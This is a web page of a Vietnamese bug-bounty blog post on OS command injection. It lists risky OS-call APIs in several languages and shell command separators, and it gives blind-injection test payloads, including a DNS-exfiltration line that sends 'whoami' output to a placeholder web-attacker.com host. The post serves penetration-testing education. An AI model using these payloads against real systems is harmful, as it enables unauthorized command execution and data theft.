<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Command Injection TIP | Hydrasky</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Một số hàm API được sử để giao tiếp với hệ điều hành có thể tiềm tàng nguy cơ bị injection nếu sử dụng: Java Runtime.exec()C&#x2F;C++ system exec ShellExecute ShellExecuteForExplore ShellPython exec eval o">
<meta property="og:type" content="article">
<meta property="og:title" content="Command Injection TIP">
<meta property="og:url" content="http://blog.hydrasky.ml/2020/11/29/OS%20command%20Injection/index.html">
<meta property="og:site_name" content="Hydrasky">
<meta property="og:description" content="Một số hàm API được sử để giao tiếp với hệ điều hành có thể tiềm tàng nguy cơ bị injection nếu sử dụng: Java Runtime.exec()C&#x2F;C++ system exec ShellExecute ShellExecuteForExplore ShellPython exec eval o">
<meta property="og:locale">
<meta property="article:published_time" content="2020-11-29T05:00:00.000Z">
<meta property="article:modified_time" content="2020-11-29T05:00:00.000Z">
<meta property="article:author" content="Le Binh An">
<meta property="article:tag" content="BugBoutyTip">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hydrasky" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hydrasky</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://blog.hydrasky.ml"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-OS command Injection" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/11/29/OS%20command%20Injection/" class="article-date">
  <time datetime="2020-11-29T05:00:00.000Z" itemprop="datePublished">2020-11-29</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Command Injection TIP
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>Một số hàm API được sử để giao tiếp với hệ điều hành có thể tiềm tàng nguy cơ bị injection nếu sử dụng:</p>
<h3 id="Java"><a href="#Java" class="headerlink" title="Java"></a>Java</h3><ul>
<li>Runtime.exec()<h3 id="C-C"><a href="#C-C" class="headerlink" title="C/C++"></a>C/C++</h3></li>
<li>system</li>
<li>exec</li>
<li>ShellExecute</li>
<li>ShellExecuteForExplore</li>
<li>Shell<h3 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h3></li>
<li>exec</li>
<li>eval</li>
<li>os.system</li>
<li>os.popen</li>
<li>subprocess.popen</li>
<li>subprocess.call</li>
<li>execfile</li>
<li>input<h3 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h3></li>
<li>passthru</li>
<li>popen</li>
<li>curl_exec</li>
<li>curl_multi_exec</li>
<li>pcntl_exec</li>
<li>system</li>
<li>shell_exec</li>
<li>exec</li>
<li>proc_open</li>
<li>eval<h2 id="Net"><a href="#Net" class="headerlink" title=".Net"></a>.Net</h2></li>
<li>Process.Start<h2 id="Node-js"><a href="#Node-js" class="headerlink" title="Node.js"></a>Node.js</h2>child_process.exec</li>
</ul>
<p>Một số ký tự có chức năng như dấu phân cách giữa các lệnh, cho phép các lệnh được xâu chuỗi lại với nhau. Các dấu phân tách lệnh sau hoạt động trên cả hệ thống dựa trên Windows và Uni</p>
<ul>
<li>&amp;</li>
<li>&amp;&amp;</li>
<li>|</li>
<li>||<br>Một số chỉ sử dụng trên Unix:</li>
<li>;</li>
<li>Xuống dòng (0x0a or \n)</li>
</ul>
<p>Sử dụng để thực hiện câu lệnh kép: “echo $(ls) “= “ls”</p>
<ul>
<li><code></code> </li>
<li>$( injected command )</li>
</ul>
<p>Một số thử thuật để khai thác hay kiểm tra lỗ hổng Blind OS Command Injection:</p>
<ul>
<li><p>Gửi mail bằng command</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mail -s &quot;This site is great&quot; -aFrom:peter@normal-user.net feedback@vulnerable-website.com</span><br></pre></td></tr></table></figure>
</li>
<li><p>Sử dụng ping để thử qua độ trễ của reponse</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp; ping -c 10 127.0.0.1 &amp;</span><br></pre></td></tr></table></figure>
</li>
<li><p>Chuyển hướng đầu ra qua một kiểu xuất dữ liệu, như tạo 1 file </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp; whoami &gt; &#x2F;var&#x2F;www&#x2F;static&#x2F;whoami.txt &amp;</span><br></pre></td></tr></table></figure></li>
<li>Sử dụng kĩ thuật OAST - dữ liệu được truy xuất bằng một kênh khác<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&amp; nslookup kgji2ohoyw.web-attacker.com &amp;</span><br><span class="line">&amp; nslookup $(whoami).kgji2ohoyw.web-attacker.com &amp;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="Payload-de-thuc-hien-fuzz"><a href="#Payload-de-thuc-hien-fuzz" class="headerlink" title="Payload để thực hiện fuzz:"></a>Payload để thực hiện fuzz:</h3><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/payloadbox/command-injection-payload-list">https://github.com/payloadbox/command-injection-payload-list</a></li>
<li><a target="_blank" rel="noopener" href="https://hackersonlineclub.com/command-injection-cheatsheet/">https://hackersonlineclub.com/command-injection-cheatsheet/</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection</a></li>
</ul>
<h3 id="Tham-khao-kien-thuc"><a href="#Tham-khao-kien-thuc" class="headerlink" title="Tham khảo kiến thức"></a>Tham khảo kiến thức</h3><ul>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/os-command-injection">https://portswigger.net/web-security/os-command-injection</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/PortSwigger/command-injection-attacker">https://github.com/PortSwigger/command-injection-attacker</a></li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://blog.hydrasky.ml/2020/11/29/OS%20command%20Injection/" data-id="ckik1yr7d0001esjm8ksm1pu8" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/BugBoutyTip/" rel="tag">BugBoutyTip</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/11/28/DVWA-Part1/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">DVWA (OWASP)</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/BugBoutyTip/" rel="tag">BugBoutyTip</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Lab/" rel="tag">Lab</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pentest-Web/" rel="tag">Pentest Web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Technology/" rel="tag">Technology</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/BugBoutyTip/" style="font-size: 13.33px;">BugBoutyTip</a> <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/Lab/" style="font-size: 10px;">Lab</a> <a href="/tags/Pentest-Web/" style="font-size: 16.67px;">Pentest Web</a> <a href="/tags/Technology/" style="font-size: 20px;">Technology</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">July 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/11/29/OS%20command%20Injection/">Command Injection TIP</a>
          </li>
        
          <li>
            <a href="/2020/11/28/DVWA-Part1/">DVWA (OWASP)</a>
          </li>
        
          <li>
            <a href="/2020/07/23/CORS/">Cross-Origin Resource Sharing</a>
          </li>
        
          <li>
            <a href="/2020/06/15/CROSS%20SIDE%20REQUEST%20FORGERY/">Cross Side Request Forgery</a>
          </li>
        
          <li>
            <a href="/2020/06/14/Oauth/">OAUTH</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 Le Binh An<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>